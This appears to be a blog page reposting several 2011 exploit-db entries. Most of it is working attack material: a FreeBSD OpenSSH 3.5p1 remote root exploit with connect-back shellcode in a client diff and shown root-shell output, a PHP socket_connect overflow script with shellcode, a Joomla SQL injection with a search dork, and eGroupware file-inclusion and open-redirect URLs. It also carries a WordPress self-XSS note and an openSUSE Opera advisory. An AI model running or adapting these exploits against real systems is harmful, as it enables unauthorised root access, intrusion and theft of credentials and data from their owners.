# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members….
————————————————————————————————————
Bug;

http://target/path/admin/LinksManager/update.asp?ItemID=xx [ SQL ATTACK]

Fonte: http://www.exploit-db.com/exploits/17484/

OpenSSH 3.5p1 Remote Root Exploit for FreeBSD

Standard

OpenSSH 3.5p1 Remote Root Exploit for FreeBSD

Discovered and Exploited By Kingcope
Year 2011
--
The last two days I have been investigating a vulnerability in OpenSSH
affecting at least FreeBSD 4.9 and 4.11. These FreeBSD versions run
OpenSSH 3.5p1 in the default install.
The sshd banner for 4.11-RELEASE is "SSH-1.99-OpenSSH_3.5p1 FreeBSD-20060930".
A working Remote Exploit which spawns a root shell remotely and
previous to authentication was developed.
The bug can be triggered both through ssh version 1 and ssh version 2
using a modified ssh client. During the investigation of the vulnerability it was found that
the bug resides in the source code file "auth2-pam-freebsd.c".
http://www.freebsd.org/cgi/cvsweb.cgi/src/crypto/openssh/Attic/auth2-pam-freebsd.c
This file does not exist in FreeBSD releases greater than 5.2.1. The last commit
is from 7 years ago.
Specifically the bug follows a code path in the PAM Authentication Thread inside this
source code, "pam_thread()". It could not be verified if the bug is inside this
(third party, freebsd) OpenSSH code or in the FreeBSD pam library itself.
Both the challenge response (ssh version 1) and keyboard interactive via pam
(ssh version 2) authentications go through this code path.
By supplying a long username to the daemon the sshd crashes.
h4x# sysctl kern.sugid_coredump=1
kern.sugid_coredump: 0 -> 1
root@debian:~# ssh -l`perl -e 'print "A" x 100'` 192.168.32.138
h4x# tail -1 /var/log/messages
Jun 30 16:01:25 h4x /kernel: pid 160 (sshd), uid 0: exited on signal 11 (core dumped)
Looking into the coredump reveals:
h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0  0x28092305 in ?? ()
(gdb) x/1i $eip
0x28092305:     (bad)
The sshd crahes at a place with illegal instructions. It looks like it depends
on how the sshd is started. Starting the sshd from the console as root and running
the ssh client with long username again reveals:
h4x# killall -9 sshd
h4x# /usr/sbin/sshd
root@debian:~# ssh -l`perl -e 'print "A" x 100'` 192.168.32.138
h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) x/10i $eip
0x41414141:     Cannot access memory at address 0x41414141.
As you can see in the above gdb output we can control EIP completely.
If someone finds out on what this behaviour depends, especially why EIP can
be controlled when starting sshd in the console and can not be easily controlled
when being run from the boot sequence, please drop me an email at
isowarez.isowarez.isowarez (at) googlemail.com
Anyhow this procedure shows that the sshd can be exploited because the instruction
pointer can be fully controlled.
The developed exploit (Proof of Concept only) is a patched OpenSSH 5.8p2 client.
Using a reverse shellcode it will spawn a rootshell.
Only one offset is needed, the position of the shellcode can be found the following way:
h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) set $x=0x08071000
(gdb) while(*++$x!=0x90909090)
>end
(gdb) x/10b $x
The printed address is the beginning of the shellcode nopsled.
Attached is the Proof of Concept as a diff to OpenSSH-5.8p2.
It roughly does the following:
root@debian:~# ./ssh -1 192.168.32.138
root@debian:~# nc -v -l -p 10000
listening on [any] 10000 ...
192.168.32.138: inverse host lookup failed: Unknown host
connect to [192.168.32.128] from (UNKNOWN) [192.168.32.138] 1038
uname -a;id;
FreeBSD h4x.localdomain 4.11-RELEASE FreeBSD 4.11-RELEASE #0: Fri Jan 21 17:21:22 GMT 2005     root (at) perseus.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
uid=0(root) gid=0(wheel) groups=0(wheel)
--
root@debian:~# diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
667a668,717
> // Connect Back Shellcode
>
> #define       IPADDR  "xc0xa8x20x80"
> #define PORT  "x27x10"              /* htons(10000) */
>
> char sc[] =
>    "x90x90"
>    "x90x90"
>    "x31xc9"                 // xor    ecx, ecx
>    "xf7xe1"                 // mul    ecx
>    "x51"                     // push   ecx
>    "x41"                     // inc    ecx
>    "x51"                     // push   ecx
>    "x41"                     // inc    ecx
>    "x51"                     // push   ecx
>    "x51"                     // push   ecx
>    "xb0x61"                 // mov    al, 97
>    "xcdx80"                 // int    80h
>    "x89xc3"                 // mov    ebx, eax
>    "x68"IPADDR                       // push   dword 0101017fh
>    "x66x68"PORT             // push   word 4135
>    "x66x51"                 // push   cx
>    "x89xe6"                 // mov    esi, esp
>    "xb2x10"                 // mov    dl, 16
>    "x52"                     // push   edx
>    "x56"                     // push   esi
>    "x50"                     // push   eax
>    "x50"                     // push   eax
>    "xb0x62"                 // mov    al, 98
>    "xcdx80"                 // int    80h
>    "x41"                     // inc    ecx
>    "xb0x5a"                 // mov    al, 90
>    "x49"                     // dec    ecx
>    "x51"                     // push   ecx
>    "x53"                     // push   ebx
>    "x53"                     // push   ebx
>    "xcdx80"                 // int    80h
>    "x41"                     // inc    ecx
>    "xe2xf5"                 // loop   -10
>    "x51"                     // push   ecx
>    "x68x2fx2fx73x68"     // push   dword 68732f2fh
>    "x68x2fx62x69x6e"     // push   dword 6e69622fh
>    "x89xe3"                 // mov    ebx, esp
>    "x51"                     // push   ecx
>    "x54"                     // push   esp
>    "x53"                     // push   ebx
>    "x53"                     // push   ebx
>    "xb0xc4x34xff"
>    "xcdx80";                // int    80h
>
679a730,737
>       char buffer[8096];
>
>       // Offset is for FreeBSD-4.11 RELEASE OpenSSH 3.5p1
>       memcpy(buffer, "AAAAx58xd8x07x08""CCCCDDDDEEEExd8xd8x07x08""GGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO", 24);
>       memset(buffer+24, 'x90', 5000);
>       memcpy(buffer+24+5000, sc, sizeof(sc));
>       server_user=buffer;
>
690a749
>
Cheers,

Kingcope

 

Fonte: http://www.exploit-db.com/exploits/17462/

Exploit for WordPress core 3.1.3 Persistent SELF XSS Vulnerability

Standard

Title: WordPress core 3.1.3 self-XSS

Author: Jelmer de Hen
Software link: http://wordpress.org/download/Version: 3.1.3
WordPress 3.1.3 has a self-XSS vulnerability in the following pages:/wp-admin/user-edit.php?user_id=<uid>/wp-admin/profile.php
By putting Javascript inside the input elements "first_name", "last_name" or "nickname" the self-XSS will trigger 3 times.

More information: http://h.ackack.net/0day-xss-in-wordpress-core.html

 

Fonte: http://www.exploit-db.com/exploits/17454/

Vulnerabilidade do Opera Browser no Opensuse 11.x

Standard
From: opensuse-security@opensuse.org
To: opensuse-security-announce@opensuse.org
Subject: [security-announce] openSUSE-SU-2011:0688-1: important: opera
Date: Fri, 24 Jun 2011 15:08:26 +0200 (CEST)
Message-ID: <20110624130826.38F8A32350@maintenance.suse.de>

openSUSE Security Update: opera ______________________________________________________________________________ Announcement ID: openSUSE-SU-2011:0688-1 Rating: important References: #694567 Affected Products: openSUSE 11.4 openSUSE 11.3 ______________________________________________________________________________ An update that contains security fixes can now be installed. It includes one version update.

Description: opera 11.11 fixes a security vulnerability.

Citing http://www.opera.com/support/kb/view/992/:

Framesets allow web pages to hold other pages inside them.

Certain frameset constructs are not handled correctly when the page is unloaded, causing a memory corruption.

To inject code, additional techniques will have to be employed. Patch Instructions:

To install this openSUSE Security Update use YaST online_update.

Alternatively you can run the command listed for your product:

– openSUSE 11.4: zypper in -t patch opera-4588 – openSUSE 11.3: zypper in -t patch opera-4588 To bring your system up-to-date, use “zypper patch”. Package List: – openSUSE 11.4 (i586 x86_64) [New Version: 11.11]: opera-11.11-1.2.1 opera-gtk-11.11-1.2.1 opera-kde4-11.11-1.2.1

– openSUSE 11.3 (i586 x86_64) [New Version: 11.11]: opera-11.11-1.2.1 opera-gtk-11.11-1.2.1 opera-kde4-11.11-1.2.1

References: https://bugzilla.novell.com/694567

Fonte: http://lwn.net/Articles/449150/

Joomla Component com_joomnik SQL Injection Vulnerability

Standard

 

<------------------- header data start ------------------- >

#############################################################
Joomla Component Joomnik Gallery SQL Injection Vulnerability
#############################################################
# Author : SOLVER ~ Bug Researchers
# Date : 26.05.2011
# Greetz : DreamPower - CWKOMANDO - Toprak - Equ - Err0r - 10line
# Name : Joomla com_joomnik
# Bug Type : SQL injection
# Infection : Admin Login Bilgileri Alinabilir.
# Example Vuln :
[+]/index.php?option=com_joomnik&album=[EXPLOIT]
[+] Dork:"com_joomnik"
[+] Demo: http://site.com/index.php?option=com_joomnik&album=6'
# Bug Fix Advice : Zararli Karakterler Filtrenmelidir.
#############################################################

http://joomlacode.org/gf/project/joomnik/

eGroupware 1.8.001.20110421 Multiple Vulnerabilities

Standard

------------------------------------------------------------------------

Software................eGroupware 1.8.001.20110421
Vulnerability...........Local File Inclusion
Threat Level............Critical (4/5)
Download................http://www.egroupware.org/
Discovery Date..........5/19/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------
--Description--
A local file inclusion vulnerability in eGroupware 1.8.001.20110421
can be exploited to include arbitrary files.
--PoC--
http://localhost/egroupware/admin/remote.php?uid=a&type=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00.jpg&creator_email=a
------------------------------------------------------------------------
Software................eGroupware 1.8.001.20110421
Vulnerability...........Open Redirect
Threat Level............Low (1/5)
Download................http://www.egroupware.org/
Discovery Date..........5/19/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------
--Description--
An open redirect in eGroupware 1.8.001.20110421 can be exploited to
redirect users to an arbitrary URL.
--PoC--

http://localhost/egroupware/phpgwapi/ntlm/index.php?forward=http://www.autosectools.com/

 

Fonte: http://www.exploit-db.com/exploits/17322/

PHP inferior ou igual a 5.3.5 socket_connect() Buffer Overflow Vulnerability

Standard

<?php

// Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian
// Affected Versions: 5.3.3-5.3.6
echo "[+] CVE-2011-1938";
echo "[+] there we go...n";
define('EVIL_SPACE_ADDR', "xffxffxeexb3");
define('EVIL_SPACE_SIZE', 1024*1024*8);
$SHELLCODE =
"x6ax31x58x99xcdx80x89xc3x89xc1x6ax46x58xcdx80xb0".
"x0bx52x68x6ex2fx73x68x68x2fx2fx62x69x89xe3x89xd1".
"xcdx80";
echo "[+] creating the sled.n";
$CODE = str_repeat("x90", EVIL_SPACE_SIZE);
for ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1 ;
$i < strlen($SHELLCODE) ; $i++, $j++) {
$CODE[$j] = $SHELLCODE[$i];
}
$b = str_repeat("A", 196).EVIL_SPACE_ADDR;
$var79 = socket_create(AF_UNIX, SOCK_STREAM, 1);
echo "[+] popping shell, have fun (if you picked the right address...)n";
$var85 = socket_connect($var79,$b);

?>

 

fonte: http://www.exploit-db.com/exploits/17318